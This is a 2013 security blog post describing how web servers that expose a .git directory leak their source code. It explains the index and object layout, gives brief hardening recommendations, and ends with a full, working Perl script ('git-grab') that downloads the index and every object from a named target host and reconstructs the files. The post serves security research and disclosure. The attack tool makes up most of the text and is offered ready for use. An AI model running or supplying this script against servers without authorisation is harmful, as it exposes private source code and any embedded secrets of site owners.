
Git Extraction – Abusing version control systems

David Lodge 04 Oct 2013

If you have heard of me, you might have read my articles on cirt.net (on SVN Pristine Extractor and Mercurial Extractor) about abusing revision and version control systems that are used to manage content on web servers. You may even have seen me presenting at the East Midlands OWASP chapter meeting in May.

I promised then that the next step would be Git. That promise is now delivered as I’ve found a real world web server being managed through Git.

Git was originally designed by Linus Torvalds (you may recognise that name) as a replacement for BitKeeper.

It is becoming more and more popular for a lot of open source projects and is used for such worthy products as the Linux kernel, Android and the Nikto web scanner.

Like SVN or Mercurial, Git stores its metadata files in a “hidden” directory: .git. This directory has several files and directories that can be used to gather information:

.git/config is a text file that tells the system the branch of the code and the source server and username used to check out the data. This is useful for information gathering but doesn’t help us further.
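As a rough illustration of that information gathering, the sketch below pulls the remote URL and branch out of a config file. The sample contents, the host git.example.com and the helper name parse_git_config are all made up for the example; a real file may contain other sections.

```perl
use strict;
use warnings;

# Hypothetical contents of a downloaded .git/config (not from a real server)
my $config = <<'END';
[core]
	repositoryformatversion = 0
[remote "origin"]
	url = ssh://deploy@git.example.com/srv/site.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
END

# Collect "key = value" pairs under their [section] headings
sub parse_git_config {
    my ($text) = @_;
    my (%settings, $section);
    for my $line (split /\n/, $text) {
        if ($line =~ /^\s*\[(.+?)\]\s*$/) {
            $section = $1;
        }
        elsif (defined $section && $line =~ /^\s*([\w.-]+)\s*=\s*(.*?)\s*$/) {
            $settings{$section}{$1} = $2;
        }
    }
    return \%settings;
}

my $settings = parse_git_config($config);
my $remote   = $settings->{'remote "origin"'}{url};
my $merge    = $settings->{'branch "master"'}{merge};
print "Remote URL: $remote\n";
print "Branch ref: $merge\n";
```

The username and server in the remote URL are the interesting parts for reconnaissance.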

.git/index is an index of all files in the repository which will allow us to extract the filenames present. This is a binary file, but the format is easy to work out and a custom tool can easily be written.

.git/objects and .git/objects/pack contain the complete objects or a packed version of them, depending on internal magical gubbins: I’ve seen Git repositories with every object loose in objects/ and I’ve seen repositories with no loose objects in objects/ at all. The important bit here is that files are stored by their SHA1 hash with no file extension.
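To make the hash-based naming concrete, here is a minimal sketch of how a file's object ID and its loose-object path can be derived. Git hashes the content prefixed with a "blob <length>" header and a NUL byte; the helper names blob_id and loose_object_path are invented for this example.

```perl
use strict;
use warnings;
use Digest::SHA qw(sha1_hex);

# Git names a blob by the SHA1 of "blob <length>\0" followed by the content
sub blob_id {
    my ($content) = @_;
    return sha1_hex("blob " . length($content) . "\0" . $content);
}

# A loose object lives at .git/objects/<first two hex chars>/<remaining 38>
sub loose_object_path {
    my ($id) = @_;
    return ".git/objects/" . substr($id, 0, 2) . "/" . substr($id, 2);
}

my $id = blob_id("hello\n");
print "$id\n";
print loose_object_path($id), "\n";
```

Packed objects are not reachable this way, so this only helps for objects that are still stored loose.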

So, we find a web server where somebody has used Git as their release mechanism and left the .git directory around; what can we do?
First off we extract .git/index, which gives us a list of filenames and their hashes:

[dave@xxxxxxxxxx git-decode]$ ./git-decode.pl index
2bf0b6f857ac399e2e8bdfa19dec4674edb8ee5e index.html
93640e83ded965b7a76f6dde906361bbf7b566d9 secretfile.php

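Now we can try to extract each file by checking whether .git/objects/93/640e83ded965b7a76f6dde906361bbf7b566d9 exists on the server (the first two characters of the hash are the directory name, the rest is the filename). If it does, we can download it, decompress it with zlib and read whatever contents it has.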
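The decompress-and-read step can be sketched on its own, without touching a server. The example below builds a stand-in object locally with compress() and then takes it apart again; parse_loose_object is a hypothetical helper name and the PHP snippet is made-up content.

```perl
use strict;
use warnings;
use Compress::Zlib qw(compress uncompress);

# Split an inflated loose object into its type, declared size and body
sub parse_loose_object {
    my ($raw) = @_;
    my $inflated = uncompress($raw);
    return unless defined $inflated;    # not valid zlib data
    my ($type, $size, $body) = $inflated =~ /\A(\w+) (\d+)\0(.*)\z/s
        or return;                      # header did not look like "type size\0"
    return { type => $type, size => $size, data => $body };
}

# Stand-in for a downloaded object: build one locally
my $content = "<?php echo 'secret'; ?>\n";
my $raw     = compress("blob " . length($content) . "\0" . $content);

my $object = parse_loose_object($raw);
print "$object->{type}, $object->{size} bytes\n";
print $object->{data};
```

Checking the type first matters because the same directory also holds tree and commit objects, which are not file contents.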

Now, I’m lazy, so I wrote a perl script which will do this for you, just after the Recommendations. The syntax for calling it is simply:

git-grab www.targetURLname.com

Recommendations

– Check security of release processes

– Don’t checkout into web directory

– Evaluate hidden files
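As one possible way to act on the last recommendation, the sketch below lists every dot-prefixed file or directory under a document root so it can be reviewed before release. The default path /var/www/html and the helper name find_hidden are assumptions for the example, not part of any standard tool.

```perl
use strict;
use warnings;
use File::Find;

# Return every dot-prefixed file or directory found beneath $root
sub find_hidden {
    my ($root) = @_;
    my @hits;
    find(sub {
        return if $_ eq '.' || $_ eq '..';
        push @hits, $File::Find::name if /^\./;
    }, $root);
    my @sorted = sort @hits;
    return @sorted;
}

# /var/www/html is an assumed document root; pass another path as an argument
my $docroot = shift(@ARGV) // '/var/www/html';
if (-d $docroot) {
    print "$_\n" for find_hidden($docroot);
}
```

Anything it prints (.git, .svn, .hg, editor backups and so on) is worth checking against what the web server will actually serve.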

GIT-GRAB script

#!/usr/bin/perl

use strict;
use File::Path qw(make_path);
use LWP::UserAgent;
use File::Temp qw(tempfile tempdir);
use Compress::Zlib qw(uncompress);

sub readtime
{
   my ($handle, $hashref) = @_;

   read $handle, my $rawtime, 8;

   ( $hashref->{'lsb32'},
     $hashref->{'nsec'} ) = unpack "NN", $rawtime;

   return $hashref;
}

sub readindex
{
   my ($infile) = @_;
   my $packindex;

   # read the header
   read $infile, my $rawheader, 12;
   my $header = {};
   ($header->{'ident'}, $header->{'version'}, $header->{'entries'})
      = unpack("a4NN", $rawheader);

   die "Not a git index file" if ($header->{'ident'} ne "DIRC");
   die "Unsupported version of git index" if ($header->{'version'} != 2);

   my @index_entries = ();

   for (my $i=0; $i<$header->{'entries'}; $i++)
   {
      my $statinfo = {};
      my $entry = {};
      my $rawdata;
      my %ctime = ();
      my %mtime = ();

      $statinfo->{'ctime'}=readtime($infile, \%ctime);
      $statinfo->{'mtime'}=readtime($infile, \%mtime);

      # read the non-time fields
      read $infile, $rawdata, 24; 
      ( $statinfo->{'dev'},
        $statinfo->{'inode'},
        $statinfo->{'mode'},
        $statinfo->{'uid'},
        $statinfo->{'gid'},
        $statinfo->{'size'} ) = unpack "NNNNNN", $rawdata;

      $entry->{'statinfo'}=$statinfo;
      read $infile, $rawdata, 20; 
      ( $entry->{'id'} ) = unpack "H*", $rawdata;
      $packindex.=$rawdata;
      read $infile, $rawdata, 2; 
      ( $entry->{'flags'} ) = unpack "n", $rawdata;

      # Finally read the name - its length is the lower 12 bits of flags
      my $namelength=($entry->{'flags'} & 0xfff)+1;

      # Pad the entry (62 fixed bytes plus the NUL-terminated name) up to a multiple of 8
      read $infile, $rawdata, $namelength + (8 - (($namelength + 62) % 8)) %8;
      ($entry->{'name'}) = unpack "a" . ($namelength-1), $rawdata;

      push(@index_entries, $entry);
   }
   return @index_entries;
}

# First grab the database file
my $target=$ARGV[0];
my $giturl="http://$ARGV[0]/.git/index";
my $ua=LWP::UserAgent->new;
print "Target is: $giturl\n";
$ua->agent("All Your Files Are Belong To Us/1.0");
my $request=HTTP::Request->new(GET => $giturl);
my $result=$ua->request($request);

if ($result->status_line !~ /^200/)
{
   die "Could not find Git index file";
}

my ($dbfileh, $dbfilen) = tempfile();
print $dbfileh $result->content;
close $dbfileh;

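open(my $infile, "<", $dbfilen) or die "Could not open $dbfilen: $!";
binmode $infile;
my @entries=readindex($infile);
close($infile);
unlink($dbfilen);

# Now walk the index and fetch each object
my $server=$target;
foreach my $entry (@entries)
{
   my $firsttwo=substr($entry->{'id'},0,2);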
   my $resthash=substr($entry->{'id'},2);

   my $file=".git/objects/" . $firsttwo . "/" . $resthash;
   my $rawdata;
   my $decompressed;
   my $oh;

   print "Extracting " . $entry->{'name'} . "\n";

   my $giturl="http://$server/$file";
   my $frequest=HTTP::Request->new(GET => $giturl);
   my $fresult=$ua->request($frequest);
   $rawdata=$fresult->content;

   # Make sure the path is there for the output
   my $outputpath="output/" . $entry->{'name'};
   $outputpath =~ s#/[^/]*$##g;

   make_path($outputpath);
   open $oh, ">", "output/$entry->{'name'}";

   # Now decompress the data
   $decompressed=uncompress($rawdata);
   my $gitfile={};

   ($gitfile->{'type'}) = substr($decompressed,0,5);
   if ($gitfile->{'type'} ne "blob ")
   {
      print "Unknown git file type: $gitfile->{'type'}. Skipping\n";
      next;
   }
   ($gitfile->{'size'}) = unpack "Z*", substr($decompressed,5);
   ($gitfile->{'data'}) = substr($decompressed,length($gitfile->{'size'})+6);

   # And write it
   print $oh $gitfile->{'data'};
   close($oh);
}